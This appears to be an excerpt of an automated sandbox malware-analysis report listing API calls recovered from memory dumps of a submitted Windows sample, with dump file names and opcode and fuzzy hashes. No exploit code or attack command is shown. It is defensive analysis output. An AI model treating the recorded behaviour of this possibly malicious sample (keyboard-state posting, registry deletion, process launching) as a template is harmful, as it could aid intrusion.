                                                                                                                • GetDC.USER32(00000000), ref: 009661F3
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009661FE
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0096620A
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00966246
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00966257
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0096902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00966291
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009662B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: 9fbe54781f4af54ab2b7752c912bfc5887a472bfbfe12ea0b7ef6774c5549547
                                                                                                                • Instruction ID: 4126342dd6cf941bf4ce7879b271f13d3b454989fe0a0d940616d4b84f143942
                                                                                                                • Opcode Fuzzy Hash: 9fbe54781f4af54ab2b7752c912bfc5887a472bfbfe12ea0b7ef6774c5549547
                                                                                                                • Instruction Fuzzy Hash: BE318D72114214BFEF108F10DC9AFEA3BADEF4A765F040065FE08DA1A1C6B59841DB70
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: 51721b0f05e73e22f553cde39ebc0993f5c9cb2fce45825e547c4a3f50bf3a5e
                                                                                                                • Instruction ID: 70e0b1a34c84ce75b044a0a51cc480fbe0137ab60a2dd300e2c489330f94bd6a
                                                                                                                • Opcode Fuzzy Hash: 51721b0f05e73e22f553cde39ebc0993f5c9cb2fce45825e547c4a3f50bf3a5e
                                                                                                                • Instruction Fuzzy Hash: 1121D4636012067BE6246B159D42FFFB36D9E9138CF088425FF4896693EF24DE1189A1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                • _wcstok.LIBCMT ref: 0094EC94
                                                                                                                • _wcscpy.LIBCMT ref: 0094ED23
                                                                                                                • _memset.LIBCMT ref: 0094ED56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X
                                                                                                                • API String ID: 774024439-3081909835
                                                                                                                • Opcode ID: 60ca3e8102930a87dbbf4d9ae82e3a782eb43fc4d55928c002460716ad1e4ff6
                                                                                                                • Instruction ID: c7e38bbd77e39b7918e318c22a68a189d752a56a8f4f795235513a201b77fe93
                                                                                                                • Opcode Fuzzy Hash: 60ca3e8102930a87dbbf4d9ae82e3a782eb43fc4d55928c002460716ad1e4ff6
                                                                                                                • Instruction Fuzzy Hash: F0C14B315083519FC724EF28D885E6AB7E4FF86314F10492DF89A9B2A2DB70EC45CB42
                                                                                                                APIs
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00956C00
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00956C21
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00956C34
                                                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00956CEA
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00956CA7
                                                                                                                  • Part of subcall function 0093A7E9: _strlen.LIBCMT ref: 0093A7F3
                                                                                                                  • Part of subcall function 0093A7E9: _memmove.LIBCMT ref: 0093A815
                                                                                                                • _strlen.LIBCMT ref: 00956D44
                                                                                                                • _memmove.LIBCMT ref: 00956DAD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 3619996494-0
                                                                                                                • Opcode ID: 8fb73a105c42765c4d80542165c1c6be4a0f7a9dc2450a3d1e7858fd93b53635
                                                                                                                • Instruction ID: cb55c6b75316b5675f18e2a29a59240ea75f5c991aab3fbb7cd846095e4bc12c
                                                                                                                • Opcode Fuzzy Hash: 8fb73a105c42765c4d80542165c1c6be4a0f7a9dc2450a3d1e7858fd93b53635
                                                                                                                • Instruction Fuzzy Hash: 8F81C171208340ABC710EB2ADC92F6AB7B9EF85714F50492CF9559B2D2DB70ED04CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8390296cb041c05873fe5fb3dd21d7b5461499518445138c4e0bb032c349af9f
                                                                                                                • Instruction ID: d37301355f613c0815c358f1517d286f82ffc158fbe7e5e2b45c87171e8592bb
                                                                                                                • Opcode Fuzzy Hash: 8390296cb041c05873fe5fb3dd21d7b5461499518445138c4e0bb032c349af9f
                                                                                                                • Instruction Fuzzy Hash: FE717930A04149EFCF14CF99CC48EBEBB7AFF86314F148149F915AA291D734AA51CBA4
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(01455560), ref: 0096B3EB
                                                                                                                • IsWindowEnabled.USER32(01455560), ref: 0096B3F7
                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0096B4DB
                                                                                                                • SendMessageW.USER32(01455560,000000B0,?,?), ref: 0096B512
                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 0096B54F
                                                                                                                • GetWindowLongW.USER32(01455560,000000EC), ref: 0096B571
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0096B589
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 4072528602-0
                                                                                                                • Opcode ID: 760acd8ba8fda0a6ca87f7805bff26ca41876ef821adea4b3c7902d343508f66
                                                                                                                • Instruction ID: c4fcd37176bb647dc77c9e857b5fa6e11c60b9c5985c01c71857c8a266535b72
                                                                                                                • Opcode Fuzzy Hash: 760acd8ba8fda0a6ca87f7805bff26ca41876ef821adea4b3c7902d343508f66
                                                                                                                • Instruction Fuzzy Hash: AB719F34605204EFDB209F54C8A4FBA7BB9EF4A300F144469F956D73B2EB72A981DB50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0095F448
                                                                                                                • _memset.LIBCMT ref: 0095F511
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0095F556
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                  • Part of subcall function 008FFC86: _wcscpy.LIBCMT ref: 008FFCA9
                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0095F5CD
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0095F5FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3522835683-2766056989
                                                                                                                • Opcode ID: 018f3c884d8b832ab5e31f4767d6c8b77629c4357e8183340c871e09ed0299dc
                                                                                                                • Instruction ID: b6bd3e8c9b97f06c645bc390252453b41ad16621167aede36ba57a9cbf55aa5b
                                                                                                                • Opcode Fuzzy Hash: 018f3c884d8b832ab5e31f4767d6c8b77629c4357e8183340c871e09ed0299dc
                                                                                                                • Instruction Fuzzy Hash: C561AE71A006299FCB04EF69C4959AEBBF5FF49320F148069E859AB361CB70AD45CF81
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00940F8C
                                                                                                                • GetKeyboardState.USER32(?), ref: 00940FA1
                                                                                                                • SetKeyboardState.USER32(?), ref: 00941002
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00941030
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0094104F
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00941095
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009410B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 4a09e1bc7490eb91863d0449832546b036327e3b6ee3b1444b120b835d448330
                                                                                                                • Instruction ID: cd13ec3df736409f4d40d76e98e27232657ebbf7d90b1a0cd95c07f242487488
                                                                                                                • Opcode Fuzzy Hash: 4a09e1bc7490eb91863d0449832546b036327e3b6ee3b1444b120b835d448330
                                                                                                                • Instruction Fuzzy Hash: AC51D2A05187D53DFB3642348C15FBABFAD6B46304F088589E2D9868D3D2E9ECC8D751
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 00940DA5
                                                                                                                • GetKeyboardState.USER32(?), ref: 00940DBA
                                                                                                                • SetKeyboardState.USER32(?), ref: 00940E1B
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00940E47
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00940E64
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00940EA8
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00940EC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 5bb09243c8290f536e3ae02ce7e959325431bd230dbef8c8f40da3b8d1a14ce7
                                                                                                                • Instruction ID: f7c0ecd98661e5bfb42d712e71e5088d4272a6a429c08fc9ac9f4211d021c6f7
                                                                                                                • Opcode Fuzzy Hash: 5bb09243c8290f536e3ae02ce7e959325431bd230dbef8c8f40da3b8d1a14ce7
                                                                                                                • Instruction Fuzzy Hash: 7151E5A09587D53DFB3283748C55F7A7EAD6B86300F08888DE2D5864C2D3A5AC98E750
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2945705084-0
                                                                                                                • Opcode ID: 63eaebfe57847a6e2eb347702f6ca684ad6f278837ab1ceadb17396f9301e886
                                                                                                                • Instruction ID: 6969438adbf11074b8dfd9782f9c47d9e4120d8406020dff5b5778afb22f174c
                                                                                                                • Opcode Fuzzy Hash: 63eaebfe57847a6e2eb347702f6ca684ad6f278837ab1ceadb17396f9301e886
                                                                                                                • Instruction Fuzzy Hash: 1B41B476C102187ACB11EBF48C46ACFB7BC9F45310F518966F608E3262EA34A245C7E6
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00943697,?), ref: 0094468B
                                                                                                                  • Part of subcall function 0094466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00943697,?), ref: 009446A4
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 009436B7
                                                                                                                • _wcscmp.LIBCMT ref: 009436D3
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 009436EB
                                                                                                                • _wcscat.LIBCMT ref: 00943733
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0094379F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1377345388-1173974218
                                                                                                                • Opcode ID: 5101b8fe4ca17e235a82465e5aee788ba8b8f371adc063d4735f3df3e95eabe6
                                                                                                                • Instruction ID: 190a65badbd01656007b97f7b1bdaa2875c2527bc6a57d5015b18c327412fb25
                                                                                                                • Opcode Fuzzy Hash: 5101b8fe4ca17e235a82465e5aee788ba8b8f371adc063d4735f3df3e95eabe6
                                                                                                                • Instruction Fuzzy Hash: F6417E71508345AEC751EF64D456EDFB7ECAF89380F00492EF49AC3291EA34D689CB52
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 009672AA
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00967351
                                                                                                                • IsMenu.USER32(?), ref: 00967369
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009673B1
                                                                                                                • DrawMenuBar.USER32 ref: 009673C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                • Opcode ID: 0bfcc1bcd78621588c4afc3445c6f665280e341af9ec0abd4745ce2847814938
                                                                                                                • Instruction ID: b7edce6b50b420413bf96d1fcec0c6f33bb06f5308c014ed59c27f5248e61b54
                                                                                                                • Opcode Fuzzy Hash: 0bfcc1bcd78621588c4afc3445c6f665280e341af9ec0abd4745ce2847814938
                                                                                                                • Instruction Fuzzy Hash: 39411675A04208EFDB20DF94E885EAABBF8FB05318F149529FD15A7350D770AD50EB90
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00960FD4
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00960FFE
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009610B5
                                                                                                                  • Part of subcall function 00960FA5: RegCloseKey.ADVAPI32(?), ref: 0096101B
                                                                                                                  • Part of subcall function 00960FA5: FreeLibrary.KERNEL32(?), ref: 0096106D
                                                                                                                  • Part of subcall function 00960FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00961090
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00961058
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 395352322-0
                                                                                                                • Opcode ID: e929079c1aa026d35fb2e1a876b9164bf3c6c0b224b1c66d7cad9477cf2b1ae5
                                                                                                                • Instruction ID: 553266992d1d6590ee19d759382310cfdc4d8f6cace962c8936b93288d45987f
                                                                                                                • Opcode Fuzzy Hash: e929079c1aa026d35fb2e1a876b9164bf3c6c0b224b1c66d7cad9477cf2b1ae5
                                                                                                                • Instruction Fuzzy Hash: BA312B71914109BFDF15DF90EC99EFFB7BCEF09340F04016AE501A2141EB749E899AA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009662EC
                                                                                                                • GetWindowLongW.USER32(01455560,000000F0), ref: 0096631F
                                                                                                                • GetWindowLongW.USER32(01455560,000000F0), ref: 00966354
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00966386
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009663B0
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 009663C1
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009663DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: 9fac87239022ee4e57f92024bc25a8d94d4219061c4afbc279524f776490449f
                                                                                                                • Instruction ID: 829880291541ebe6e9155c987bbd0fbcd0707e81f677dcabfeb00c7fc575f065
                                                                                                                • Opcode Fuzzy Hash: 9fac87239022ee4e57f92024bc25a8d94d4219061c4afbc279524f776490449f
                                                                                                                • Instruction Fuzzy Hash: 2231F030658255AFDB20CF18EC98F593BE9FB4A714F1901A8F551DF2B2CB71A840EB91
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DB2E
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0093DB54
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0093DB57
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0093DB75
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0093DB7E
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0093DBA3
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0093DBB1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
